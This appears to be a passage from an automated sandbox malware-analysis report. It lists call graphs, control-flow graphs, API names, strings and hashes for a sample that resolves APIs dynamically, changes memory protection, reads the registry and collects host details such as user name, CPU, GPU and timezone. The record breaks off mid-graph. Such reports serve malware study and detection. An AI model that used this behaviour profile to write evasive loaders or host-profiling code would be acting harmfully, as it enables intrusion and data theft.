7ff7aa1030ec LoadLibraryA 79775->79777 79784 7ff7aa1030a9 79775->79784 79805 7ff7aa102380 54 API calls 5 library calls 79775->79805 79776->79770 79780 7ff7aa10318c 79776->79780 79781 7ff7aa102fb5 ISource 79776->79781 79778 7ff7aa103107 GetProcAddress 79777->79778 79779 7ff7aa103103 79777->79779 79778->79779 79779->79780 79779->79781 79783 7ff7aa12039c _invalid_parameter_noinfo_noreturn 52 API calls 79780->79783 79782 7ff7aa12cbc0 std::_Xinvalid_argument 8 API calls 79781->79782 79785 7ff7aa103171 79782->79785 79787 7ff7aa103191 79783->79787 79784->79777 79785->79762 79786 7ff7aa1031df 79786->79762 79787->79786 79789 7ff7aa102e10 55 API calls 79787->79789 79789->79786 79791 7ff7aa1027f9 79790->79791 79795 7ff7aa102736 79790->79795 79806 7ff7aa101eb0 54 API calls std::_Xinvalid_argument 79791->79806 79793 7ff7aa10276c 79796 7ff7aa12ce54 std::_Facet_Register 54 API calls 79793->79796 79794 7ff7aa1027fe 79807 7ff7aa101df0 54 API calls 3 library calls 79794->79807 79795->79793 79798 7ff7aa10273c _Yarn 79795->79798 79799 7ff7aa1027c5 79795->79799 79800 7ff7aa1027ba 79795->79800 79802 7ff7aa102782 79796->79802 79798->79775 79801 7ff7aa12ce54 std::_Facet_Register 54 API calls 79799->79801 79800->79793 79800->79794 79801->79798 79802->79798 79803 7ff7aa12039c _invalid_parameter_noinfo_noreturn 52 API calls 79802->79803 79804 7ff7aa10280a 79803->79804 79805->79784 79807->79802 79808 7ff7aa104050 79847 7ff7aa103950 79808->79847 79811 7ff7aa12cbc0 std::_Xinvalid_argument 8 API calls 79813 7ff7aa104337 79811->79813 79814 7ff7aa104098 79815 7ff7aa1042cc 79814->79815 79816 7ff7aa1040ac 79814->79816 79818 7ff7aa103e40 9 API calls 79815->79818 79817 7ff7aa103c20 9 API calls 79816->79817 79819 7ff7aa1040c3 79817->79819 79820 7ff7aa1042df 79818->79820 79821 7ff7aa1041f6 79819->79821 79823 7ff7aa104f00 9 API calls 79819->79823 79820->79821 79822 7ff7aa1042e5 VirtualAlloc 79820->79822 79821->79811 79822->79821 79824 7ff7aa104304 _Yarn 79822->79824 79825 7ff7aa1040f3 79823->79825 79824->79821 79825->79821 79826 7ff7aa104f00 9 API calls 79825->79826 79827 7ff7aa10412b 79826->79827 79827->79821 79828 7ff7aa104f00 9 API calls 79827->79828 79832 7ff7aa104156 79828->79832 79829 7ff7aa10419a 79829->79821 79830 7ff7aa1041a6 VirtualAlloc 79829->79830 79830->79821 79831 7ff7aa1041c9 79830->79831 79864 7ff7aa104350 9 API calls _Yarn 79831->79864 79832->79829 79833 7ff7aa104f00 9 API calls 79832->79833 79835 7ff7aa10417c 79833->79835 79835->79829 79836 7ff7aa104f00 9 API calls 79835->79836 79836->79829 79837 7ff7aa1041da 79837->79821 79838 7ff7aa104f00 9 API calls 79837->79838 79840 7ff7aa10421a 79838->79840 79842 7ff7aa104f00 9 API calls 79840->79842 79846 7ff7aa10425e 79840->79846 79841 7ff7aa1042a2 79841->79821 79843 7ff7aa1042aa VirtualFree 79841->79843 79844 7ff7aa104240 79842->79844 79843->79821 79845 7ff7aa104f00 9 API calls 79844->79845 79844->79846 79845->79846 79865 7ff7aa1045a0 9 API calls 79846->79865 79848 7ff7aa103975 79847->79848 79849 7ff7aa10396a 79847->79849 79848->79821 79853 7ff7aa103f60 79848->79853 79850 7ff7aa104f00 9 API calls 79849->79850 79851 7ff7aa10396f 79849->79851 79850->79851 79851->79848 79852 7ff7aa104f00 9 API calls 79851->79852 79852->79848 79854 7ff7aa104031 79853->79854 79855 7ff7aa103f7e 79853->79855 79854->79814 79856 7ff7aa103950 9 API calls 79855->79856 79857 7ff7aa103f83 79856->79857 79857->79854 79858 7ff7aa104f00 9 API calls 79857->79858 79860 7ff7aa103fa1 79858->79860 79859 7ff7aa103fe9 79859->79814 79860->79859 79861 7ff7aa104f00 9 API calls 79860->79861 79862 7ff7aa103fcb 79861->79862 79862->79859 79863 7ff7aa104f00 9 API calls 79862->79863 79863->79859 79864->79837 79865->79841 79866 218bfbd98ee 79871 218bfbda1e0 79866->79871 79869 218bfbfcb70 _Strcoll 3 API calls 79870 218bfbd992b 79869->79870 79873 218bfbda206 79871->79873 79872 218bfbda232 79875 218bfbdabc0 38 API calls 79872->79875 79873->79872 79880 218bfbbb010 38 API calls 4 library calls 79873->79880 79876 218bfbda297 79875->79876 79877 218bfbd98f6 79876->79877 79878 218bfb95990 38 API calls 79876->79878 79879 218bfbdabc0 38 API calls 79876->79879 79877->79869 79878->79876 79879->79876 79880->79872 79881 218bfbd6929 79882 218bfbd6954 79881->79882 79883 218bfbd693f 79881->79883 79885 218bfbd6b20 79882->79885 79889 218bfbd695d 79882->79889 79886 218bfbfcb70 _Strcoll 3 API calls 79883->79886 79884 218bfbd6b89 79888 218bfbd65d0 3 API calls 79884->79888 79885->79884 79890 218bfbd65d0 3 API calls 79885->79890 79891 218bfbd6f13 79886->79891 79887 218bfbd6aaa 79894 218bfbd65d0 3 API calls 79887->79894 79888->79883 79892 218bfb95b00 38 API calls 79889->79892 79893 218bfbd69ba memcpy_s 79889->79893 79890->79885 79892->79893 79893->79887 79895 218bfbd65d0 3 API calls 79893->79895 79894->79883 79895->79893 79896 218bfbd662b 79897 218bfbd6651 79896->79897 79912 218bfbd663c 79896->79912 79898 218bfbd665a 79897->79898 79913 218bfbd681f 79897->79913 79901 218bfb8fc80 38 API calls 79898->79901 79916 218bfbd66b2 79898->79916 79899 218bfbd68cf 79903 218bfbd70b0 38 API calls 79899->79903 79900 218bfbfcb70 _Strcoll 3 API calls 79902 218bfbd6f13 79900->79902 79901->79916 79905 218bfbd68e8 79903->79905 79904 218bfbd70b0 38 API calls 79904->79913 79910 218bfbd65d0 3 API calls 79905->79910 79906 218bfbd6782 79909 218bfbd70b0 38 API calls 79906->79909 79907 218bfbd65d0 3 API calls 79907->79913 79908 218bfbd70b0 38 API calls 79908->79916 79911 218bfbd67bb 79909->79911 79910->79912 79915 218bfbd65d0 3 API calls 79911->79915 79912->79900 79913->79899 79913->79904 79913->79907 79914 218bfbd65d0 3 API calls 79914->79916 79915->79912 79916->79906 79916->79908 79916->79914 79917 218bfbc9fe0 79918 218bfbca073 79917->79918 79919 218bfb7d6c0 38 API calls 79918->79919 79920 218bfbca098 _Receive_impl 79919->79920 79921 218bfb7e9a0 44 API calls 79920->79921 79923 218bfbca5e7 79920->79923 79924 218bfbca104 memcpy_s 79921->79924 79922 218bfbca146 79922->79923 79925 218bfbca1a7 _Receive_impl 79922->79925 79977 218bfb7e0f0 39 API calls Concurrency::cancel_current_task 79923->79977 79924->79922 79927 218bfbd91d0 71 API calls 79924->79927 79928 218bfbfcb70 _Strcoll 3 API calls 79925->79928 79930 218bfbca229 79927->79930 79929 218bfbca1d9 79928->79929 79931 218bfbca4b0 79930->79931 79934 218bfbd79c0 38 API calls 79930->79934 79931->79925 79976 218bfba19c0 38 API calls 79931->79976 79932 218bfbca60f 79978 218bfb7cc70 38 API calls 79932->79978 79937 218bfbca2a2 79934->79937 79936 218bfbca636 Concurrency::cancel_current_task 79979 218bfb7cc70 38 API calls 79936->79979 79938 218bfbca342 79937->79938 79939 218bfbca2bf 79937->79939 79940 218bfbd6110 38 API calls 79938->79940 79939->79932 79941 218bfbca2f1 79939->79941 79943 218bfbca356 79940->79943 79944 218bfbd5f50 39 API calls 79941->79944 79948 218bfbca3f0 79943->79948 79949 218bfbca36d 79943->79949 79945 218bfbca2fe 79944->79945 79946 218bfb90fb0 38 API calls 79945->79946 79947 218bfbca31e 79946->79947 79973 218bfba0cd0 38 API calls 79947->79973 79951 218bfbd6110 38 API calls 79948->79951 79949->79936 79953 218bfbca39f 79949->79953 79954 218bfbca404 79951->79954 79952 218bfbca670 Concurrency::cancel_current_task 79980 218bfb7cc70 38 API calls 79952->79980 79955 218bfbd5f50 39 API calls 79953->79955 79956 218bfbd6110 38 API calls 79954->79956 79957 218bfbca3ac 79955->79957 79958 218bfbca413 79956->79958 79960 218bfb90fb0 38 API calls 79957->79960 79961 218bfbb4500 39 API calls 79958->79961 79963 218bfbca3cc 79960->79963 79965 218bfbca423 79961->79965 79962 218bfbca6ae Concurrency::cancel_current_task 79974 218bfba0cd0 38 API calls 79963->79974 79965->79952 79966 218bfbd5f50 39 API calls 79965->79966 79967 218bfbca463 79966->79967 79968 218bfb8fe50 38 API calls 79967->79968 79969 218bfbca473 79968->79969 79970 218bfb90fb0 38 API calls 79969->79970 79971 218bfbca4a2 79970->79971 79975 218bfba0cd0 38 API calls 79971->79975 79973->79925 79974->79925 79975->79931 79976->79922 79978->79936 79979->79952 79980->79962 79981 218bfb91925 79982 218bfbfcb98 std::_Facet_Register 38 API calls 79981->79982 79983 218bfb91937 79982->79983 79984 218bfb8fe50 38 API calls 79983->79984 79985 218bfb91951 79984->79985 79986 218bfbfcb70 _Strcoll 3 API calls 79985->79986 79987 218bfb91a33 79986->79987 79988 218bfbf31a1 80000 218bfbfa234 79988->80000 80001 218bfbe81fc _Getcoll 37 API calls 80000->80001 80002 218bfbfa23d __crtLCMapStringW 80001->80002 80005 218bfbe7bc4 37 API calls __std_fs_directory_iterator_open 80002->80005 80006 7ff7aa107a80 GetCurrentProcess OpenProcessToken 80007 7ff7aa107b28 80006->80007 80008 7ff7aa107aec GetTokenInformation 80006->80008 80009 7ff7aa107b73 80007->80009 80010 7ff7aa107b53 RtlEnterCriticalSection RtlLeaveCriticalSection 80007->80010 80008->80007 80031 7ff7aa101070 80009->80031 80010->80009 80013 7ff7aa107b8d 80016 7ff7aa107b9b 80013->80016 80046 7ff7aa1019a0 80013->80046 80014 7ff7aa103e40 9 API calls 80014->80013 80063 7ff7aa104ae0 80016->80063 80018 7ff7aa107ba6 80019 7ff7aa104f00 9 API calls 80018->80019 80027 7ff7aa107c53 80018->80027 80022 7ff7aa107bbc 80019->80022 80020 7ff7aa12cbc0 std::_Xinvalid_argument 8 API calls 80021 7ff7aa107c87 80020->80021 80023 7ff7aa104f00 9 API calls 80022->80023 80022->80027 80024 7ff7aa107bf2 80023->80024 80025 7ff7aa104f00 9 API calls 80024->80025 80024->80027 80026 7ff7aa107c10 80025->80026 80026->80027 80028 7ff7aa104f00 9 API calls 80026->80028 80027->80020 80029 7ff7aa107c35 80028->80029 80029->80027 80030 7ff7aa104f00 9 API calls 80029->80030 80030->80027 80032 7ff7aa103c20 9 API calls 80031->80032 80033 7ff7aa101097 80032->80033 80035 7ff7aa104f00 9 API calls 80033->80035 80045 7ff7aa10109c 80033->80045 80034 7ff7aa12cbc0 std::_Xinvalid_argument 8 API calls 80036 7ff7aa101281 80034->80036 80037 7ff7aa1010c6 80035->80037 80036->80013 80036->80014 80038 7ff7aa104f00 9 API calls 80037->80038 80037->80045 80039 7ff7aa1010fc 80038->80039 80040 7ff7aa104f00 9 API calls 80039->80040 80039->80045 80041 7ff7aa101126 80040->80041 80042 7ff7aa103e40 9 API calls 80041->80042 80041->80045 80043 7ff7aa101145 80042->80043 80044 7ff7aa103c20 9 API calls 80043->80044 80044->80045 80045->80034 80079 7ff7aa1016c0 GetModuleHandleW 80046->80079 80049 7ff7aa1019cf 80051 7ff7aa12cbc0 std::_Xinvalid_argument 8 API calls 80049->80051 80050 7ff7aa1019d9 RtlGetNtVersionNumbers 80053 7ff7aa101a19 80050->80053 80054 7ff7aa101bbf 80051->80054 80052 7ff7aa101a45 RtlGetNtVersionNumbers 80058 7ff7aa101a7f _Yarn 80052->80058 80053->80052 80095 7ff7aa1015f0 80053->80095 80054->80016 80057 7ff7aa101af1 RtlImageDirectoryEntryToData 80060 7ff7aa101b24 80057->80060 80058->80057 80058->80060 80059 7ff7aa101b56 RtlGetNtVersionNumbers 80059->80049 80060->80059 80061 7ff7aa1015f0 10 API calls 80060->80061 80062 7ff7aa101b52 80061->80062 80062->80049 80062->80059 80064 7ff7aa103e40 9 API calls 80063->80064 80065 7ff7aa104b12 80064->80065 80104 7ff7aa104840 55 API calls 80065->80104 80067 7ff7aa104c31 ISource 80068 7ff7aa12cbc0 std::_Xinvalid_argument 8 API calls 80067->80068 80070 7ff7aa104c58 80068->80070 80069 7ff7aa104c71 80071 7ff7aa12039c _invalid_parameter_noinfo_noreturn 52 API calls 80069->80071 80070->80018 80074 7ff7aa104c76 80071->80074 80072 7ff7aa104b49 80072->80067 80072->80069 80073 7ff7aa104cba ISource 80073->80018 80074->80073 80075 7ff7aa12039c _invalid_parameter_noinfo_noreturn 52 API calls 80074->80075 80076 7ff7aa104cda 80075->80076 80077 7ff7aa12039c _invalid_parameter_noinfo_noreturn 52 API calls 80076->80077 80078 7ff7aa104d21 80077->80078 80080 7ff7aa10171a RtlImageNtHeader RtlGetNtVersionNumbers 80079->80080 80093 7ff7aa101961 80079->80093 80081 7ff7aa101786 80080->80081 80082 7ff7aa101797 RtlGetNtVersionNumbers 80080->80082 80081->80082 80085 7ff7aa10178c 80081->80085 80087 7ff7aa1017c3 80082->80087 80083 7ff7aa12cbc0 std::_Xinvalid_argument 8 API calls 80084 7ff7aa10196f 80083->80084 80084->80049 80084->80050 80085->80093 80102 7ff7aa101470 54 API calls 80085->80102 80086 7ff7aa10181f RtlImageNtHeader 80086->80087 80087->80085 80087->80086 80089 7ff7aa10186b 80087->80089 80087->80093 80090 7ff7aa101878 RtlImageNtHeader 80089->80090 80089->80093 80090->80085 80091 7ff7aa1018f0 RtlGetNtVersionNumbers 80092 7ff7aa1018db 80091->80092 80092->80091 80092->80093 80103 7ff7aa101470 54 API calls 80092->80103 80093->80083 80096 7ff7aa101616 NtQueryVirtualMemory 80095->80096 80097 7ff7aa10164f NtProtectVirtualMemory 80095->80097 80096->80097 80098 7ff7aa10169e 80096->80098 80097->80098 80100 7ff7aa12cbc0 std::_Xinvalid_argument 8 API calls 80098->80100 80101 7ff7aa1016ab 80100->80101 80101->80049 80101->80052 80102->80092 80103->80092 80104->80072 80105 218bfbe749c 80106 218bfbe74b2 80105->80106 80107 218bfbe74cd 80105->80107 80133 218bfbe40cc 7 API calls _get_daylight 80106->80133 80107->80106 80109 218bfbe74e6 80107->80109 80111 218bfbe74ec 80109->80111 80114 218bfbe7509 80109->80114 80110 218bfbe74b7 80134 218bfbdfbec 37 API calls _invalid_parameter_noinfo 80110->80134 80135 218bfbe40cc 7 API calls _get_daylight 80111->80135 80129 218bfbf16e0 80114->80129 80115 218bfbe74c3 80120 218bfbe7783 80125 218bfbe75c6 80125->80115 80155 218bfbf1724 37 API calls _isindst 80125->80155 80126 218bfbe7566 80126->80115 80154 218bfbf1724 37 API calls _isindst 80126->80154 80130 218bfbe750e 80129->80130 80131 218bfbf16ef 80129->80131 80136 218bfbf07f8 80130->80136 80131->80130 80156 218bfbf1550 80131->80156 80133->80110 80134->80115 80135->80115 80137 218bfbf0801 80136->80137 80138 218bfbe7523 80136->80138 80238 218bfbe40cc 7 API calls _get_daylight 80137->80238 80138->80120 80142 218bfbf0828 80138->80142 80140 218bfbf0806 80239 218bfbdfbec 37 API calls _invalid_parameter_noinfo 80140->80239 80143 218bfbf0831 80142->80143 80144 218bfbe7534 80142->80144 80240 218bfbe40cc 7 API calls _get_daylight 80143->80240 80144->80120 80148 218bfbf0858 80144->80148 80146 218bfbf0836 80241 218bfbdfbec 37 API calls _invalid_parameter_noinfo 80146->80241 80149 218bfbf0861 80148->80149 80150 218bfbe7545 80148->80150 80242 218bfbe40cc 7 API calls _get_daylight 80149->80242 80150->80120 80150->80125 80150->80126 80152 218bfbf0866 80243 218bfbdfbec 37 API calls _invalid_parameter_noinfo 80152->80243 80154->80115 80155->80115 80178 218bfbf9d94 80156->80178 80187 218bfbf9c9c 80178->80187 80179 218bfbf9cd3 80230 218bfbe40cc 7 API calls _get_daylight 80179->80230 80181 218bfbf9cd8 80231 218bfbdfbec 37 API calls _invalid_parameter_noinfo 80181->80231 80183 218bfbf9ce4 80234 218bfbea720 LeaveCriticalSection 80183->80234 80187->80178 80187->80179 80187->80183 80232 218bfbf9c04 42 API calls wcsftime 80187->80232 80233 218bfbf62e8 37 API calls 2 library calls 80187->80233 80230->80181 80231->80183 80232->80187 80233->80187 80238->80140 80239->80138 80240->80146 80241->80144 80242->80152 80243->80150 80244 218bfbd0ddb RegOpenKeyExA 80245 218bfbd0e05 RegQueryValueExA 80244->80245 80251 218bfbd0e44 _Receive_impl 80244->80251 80245->80251 80246 218bfbd0ed4 RegCloseKey 80247 218bfbd0eda 80246->80247 80249 218bfbfcb70 _Strcoll 3 API calls 80247->80249 80250 218bfbd0eed 80249->80250 80251->80246 80251->80247

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Object$DeleteMetricsSystem$CreateSelectStream_$CapsCompatibleCriticalDeviceReleaseSection$BitmapEnterLeaveReadResetSizeStream
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3214587331-3916222277
                                                                                                                                                                  • Opcode ID: e8e9b911cd9b9f557c011d0a693391b94df579aa06795856880fde4b09ecdcd5
                                                                                                                                                                  • Instruction ID: d781699e36bd7eb80a2482a3e7ebe63c01f32477866f60941e7accf6e4c16322
                                                                                                                                                                  • Opcode Fuzzy Hash: e8e9b911cd9b9f557c011d0a693391b94df579aa06795856880fde4b09ecdcd5
                                                                                                                                                                  • Instruction Fuzzy Hash: A6B12072618BD086E760DF21E8983DFB7A5F799B84F408515DA8983B69DF3CC585CB00

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 40 218bfc098c0-218bfc09900 41 218bfc09902-218bfc09909 40->41 42 218bfc09915-218bfc0991e 40->42 41->42 43 218bfc0990b-218bfc09910 41->43 44 218bfc0993a-218bfc0993c 42->44 45 218bfc09920-218bfc09923 42->45 46 218bfc09b94-218bfc09bba call 218bfbfcb70 43->46 48 218bfc09b92 44->48 49 218bfc09942-218bfc09946 44->49 45->44 47 218bfc09925-218bfc0992d 45->47 50 218bfc0992f-218bfc09931 47->50 51 218bfc09933-218bfc09936 47->51 48->46 53 218bfc0994c-218bfc0994f 49->53 54 218bfc09a1d-218bfc09a44 call 218bfc09c94 49->54 50->44 50->51 51->44 55 218bfc09951-218bfc09959 53->55 56 218bfc09963-218bfc09975 GetFileAttributesExW 53->56 63 218bfc09a66-218bfc09a6f 54->63 64 218bfc09a46-218bfc09a4f 54->64 55->56 59 218bfc0995b-218bfc0995d 55->59 61 218bfc099c8-218bfc099d7 56->61 62 218bfc09977-218bfc09980 call 218bfc22160 56->62 59->54 59->56 66 218bfc099db-218bfc099dd 61->66 62->46 75 218bfc09986-218bfc09998 FindFirstFileW 62->75 70 218bfc09b23-218bfc09b2c 63->70 71 218bfc09a75-218bfc09a8d GetFileInformationByHandleEx 63->71 67 218bfc09a5f-218bfc09a61 64->67 68 218bfc09a51-218bfc09a59 call 218bfc22138 64->68 72 218bfc099e9-218bfc09a17 66->72 73 218bfc099df-218bfc099e7 66->73 67->46 68->67 94 218bfc09bd5-218bfc09bda call 218bfbe7bc4 68->94 78 218bfc09b7b-218bfc09b7d 70->78 79 218bfc09b2e-218bfc09b42 GetFileInformationByHandleEx 70->79 76 218bfc09a8f-218bfc09a9b call 218bfc22160 71->76 77 218bfc09ab5-218bfc09ace 71->77 72->48 72->54 73->54 73->72 82 218bfc0999a-218bfc099a0 call 218bfc22160 75->82 83 218bfc099a5-218bfc099c6 FindClose 75->83 106 218bfc09a9d-218bfc09aa8 call 218bfc22138 76->106 107 218bfc09aae-218bfc09ab0 76->107 77->70 80 218bfc09ad0-218bfc09ad4 77->80 84 218bfc09bbb-218bfc09bbf 78->84 85 218bfc09b7f-218bfc09b83 78->85 87 218bfc09b68-218bfc09b78 79->87 88 218bfc09b44-218bfc09b50 call 218bfc22160 79->88 92 218bfc09b1c 80->92 93 218bfc09ad6-218bfc09af0 GetFileInformationByHandleEx 80->93 82->46 83->66 90 218bfc09bce-218bfc09bd3 84->90 91 218bfc09bc1-218bfc09bcc call 218bfc22138 84->91 85->48 96 218bfc09b85-218bfc09b90 call 218bfc22138 85->96 87->78 88->107 108 218bfc09b56-218bfc09b61 call 218bfc22138 88->108 90->46 91->90 91->94 105 218bfc09b20 92->105 100 218bfc09af2-218bfc09afe call 218bfc22160 93->100 101 218bfc09b13-218bfc09b1a 93->101 116 218bfc09bdb-218bfc09be0 call 218bfbe7bc4 94->116 96->48 96->94 100->107 119 218bfc09b00-218bfc09b0b call 218bfc22138 100->119 101->105 105->70 106->107 121 218bfc09be7-218bfc09bef call 218bfbe7bc4 106->121 107->46 122 218bfc09be1-218bfc09be6 call 218bfbe7bc4 108->122 123 218bfc09b63 108->123 116->122 119->116 130 218bfc09b11 119->130 122->121 123->107 130->107
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Close$ErrorFileFindHandleLast$AttributesFirst__std_fs_open_handle
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2398595512-0
                                                                                                                                                                  • Opcode ID: 9b9cafa6476ba7d57e6375b49b2d31870033937920a690a77e8b0d8031f3f21f
                                                                                                                                                                  • Instruction ID: 6eb5ffb0056aae02d9991855c3f6ea54e3d4c4e874d2d8e8f0e96bdef749e60e
                                                                                                                                                                  • Opcode Fuzzy Hash: 9b9cafa6476ba7d57e6375b49b2d31870033937920a690a77e8b0d8031f3f21f
                                                                                                                                                                  • Instruction Fuzzy Hash: 81918431308A6546F7748B35A4A87DD6391EBA5778F1447149ABAC7FF4DF38CA828700
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: InformationTimeZone
                                                                                                                                                                  • String ID: %d-%m-%Y, %H:%M:%S$[UTC$computer_name$cpu$gpu$ram$system$time$timezone$user_name
                                                                                                                                                                  • API String ID: 565725191-1610854563
                                                                                                                                                                  • Opcode ID: 9449ef4c8fbebb67dcfedb36010e1ff24175418aaaadfe970051ef0a00c87de4
                                                                                                                                                                  • Instruction ID: bcfcec1e1ba0777cee3a5d42ca7f36a21f3b59deb3ecbdcadbdebfbf5956c338
                                                                                                                                                                  • Opcode Fuzzy Hash: 9449ef4c8fbebb67dcfedb36010e1ff24175418aaaadfe970051ef0a00c87de4
                                                                                                                                                                  • Instruction Fuzzy Hash: 98237E73618BC486EB20CF25E8943DD77A1F7A9798F409215EA9D47B9ADF78C680C700
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Name$DevicesDisplayEnum$ComputerCurrentFileGlobalMemoryModuleProfileStatusUserValuewcsftime
                                                                                                                                                                  • String ID: %d-%m-%Y, %H:%M:%S$computer_name$cpu$gpu$ram$system$time$timezone$user_name
                                                                                                                                                                  • API String ID: 2509368203-1182675529
                                                                                                                                                                  • Opcode ID: ac15086096fe2e7ea63c59c9354845439d33d78b9b990f4932066cd85544c1a0
                                                                                                                                                                  • Instruction ID: f428d996064c00cf7485ac8f762c1de3329a47c95d9f9d1eba1c0eed95b9db69
                                                                                                                                                                  • Opcode Fuzzy Hash: ac15086096fe2e7ea63c59c9354845439d33d78b9b990f4932066cd85544c1a0
                                                                                                                                                                  • Instruction Fuzzy Hash: 1DF27B33618BC096DB20CF65E8943DD77A1F799798F409215EA9D87BAADF78C680C700

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 1193 218bfb8b820-218bfb8b91f LoadLibraryA 1194 218bfb8c7e0-218bfb8c7ea 1193->1194 1195 218bfb8b925-218bfb8bce0 GetProcAddress * 6 1193->1195 1196 218bfb8c7f9-218bfb8c7fc 1194->1196 1197 218bfb8c7ec-218bfb8c7ee 1194->1197 1195->1194 1198 218bfb8bce6-218bfb8bce9 1195->1198 1200 218bfb8c807-218bfb8c836 call 218bfbfcb70 1196->1200 1201 218bfb8c7fe-218bfb8c801 FreeLibrary 1196->1201 1197->1196 1198->1194 1199 218bfb8bcef-218bfb8bcf2 1198->1199 1199->1194 1202 218bfb8bcf8-218bfb8bcfb 1199->1202 1201->1200 1202->1194 1205 218bfb8bd01-218bfb8bd04 1202->1205 1205->1194 1207 218bfb8bd0a-218bfb8bd0d 1205->1207 1207->1194 1208 218bfb8bd13-218bfb8bd21 1207->1208 1209 218bfb8bd25-218bfb8bd27 1208->1209 1209->1194 1210 218bfb8bd2d-218bfb8bd39 1209->1210 1210->1194 1211 218bfb8bd3f-218bfb8bd48 1210->1211 1212 218bfb8bd50-218bfb8bd6b 1211->1212 1214 218bfb8bd71-218bfb8bd8f 1212->1214 1215 218bfb8c7c7-218bfb8c7d3 1212->1215 1214->1215 1218 218bfb8bd95-218bfb8bda7 1214->1218 1215->1212 1216 218bfb8c7d9 1215->1216 1216->1194 1219 218bfb8c7b3-218bfb8c7c2 1218->1219 1220 218bfb8bdad 1218->1220 1219->1215 1221 218bfb8bdb2-218bfb8be03 call 218bfbfcb98 1220->1221 1226 218bfb8c082 1221->1226 1227 218bfb8be09-218bfb8be10 1221->1227 1229 218bfb8c084-218bfb8c08b 1226->1229 1227->1226 1228 218bfb8be16-218bfb8bf0f call 218bfbc1bf0 call 218bfb922d0 call 218bfb925a0 1227->1228 1255 218bfb8bf10-218bfb8bf18 1228->1255 1231 218bfb8c301-218bfb8c33d 1229->1231 1232 218bfb8c091-218bfb8c098 1229->1232 1240 218bfb8c343-218bfb8c351 1231->1240 1241 218bfb8c5d7-218bfb8c5d9 1231->1241 1232->1231 1234 218bfb8c09e-218bfb8c18b call 218bfbc1bf0 call 218bfb922d0 call 218bfb925a0 1232->1234 1265 218bfb8c192-218bfb8c19a 1234->1265 1246 218bfb8c5d0-218bfb8c5d3 1240->1246 1247 218bfb8c357-218bfb8c35e 1240->1247 1242 218bfb8c785-218bfb8c79b call 218bfb8e3a0 1241->1242 1243 218bfb8c5df-218bfb8c708 call 218bfb95330 call 218bfb8eda0 call 218bfb95330 call 218bfb8eda0 call 218bfb90fb0 call 218bfbfcb98 call 218bfba9100 1241->1243 1262 218bfb8bdb0 1242->1262 1263 218bfb8c7a1-218bfb8c7ac 1242->1263 1340 218bfb8c714-218bfb8c727 call 218bfb90840 1243->1340 1341 218bfb8c70a-218bfb8c70c 1243->1341 1246->1241 1252 218bfb8c5d5 1246->1252 1247->1246 1253 218bfb8c364-218bfb8c458 call 218bfbc1bf0 call 218bfb922d0 call 218bfb925a0 1247->1253 1252->1241 1283 218bfb8c460-218bfb8c467 1253->1283 1255->1255 1261 218bfb8bf1a-218bfb8bf74 call 218bfb95330 call 218bfb93990 call 218bfb90fb0 1255->1261 1289 218bfb8bfa7-218bfb8bfd1 1261->1289 1290 218bfb8bf76-218bfb8bf87 1261->1290 1262->1221 1263->1219 1265->1265 1270 218bfb8c19c-218bfb8c1f5 call 218bfb95330 call 218bfb93990 call 218bfb90fb0 1265->1270 1305 218bfb8c1f7-218bfb8c208 1270->1305 1306 218bfb8c228-218bfb8c252 1270->1306 1283->1283 1287 218bfb8c469-218bfb8c4c2 call 218bfb95330 call 218bfb93990 call 218bfb90fb0 1283->1287 1355 218bfb8c4f5-218bfb8c51e 1287->1355 1356 218bfb8c4c4-218bfb8c4d5 1287->1356 1298 218bfb8bfd3-218bfb8bfe7 1289->1298 1299 218bfb8c009-218bfb8c02f 1289->1299 1294 218bfb8bfa2 call 218bfbfcb90 1290->1294 1295 218bfb8bf89-218bfb8bf9c 1290->1295 1294->1289 1295->1294 1303 218bfb8c891-218bfb8c896 call 218bfbdfc0c 1295->1303 1308 218bfb8c002-218bfb8c007 call 218bfbfcb90 1298->1308 1309 218bfb8bfe9-218bfb8bffc 1298->1309 1301 218bfb8c031-218bfb8c045 1299->1301 1302 218bfb8c067-218bfb8c080 1299->1302 1312 218bfb8c060-218bfb8c065 call 218bfbfcb90 1301->1312 1313 218bfb8c047-218bfb8c05a 1301->1313 1302->1229 1317 218bfb8c897-218bfb8c89c call 218bfbdfc0c 1303->1317 1314 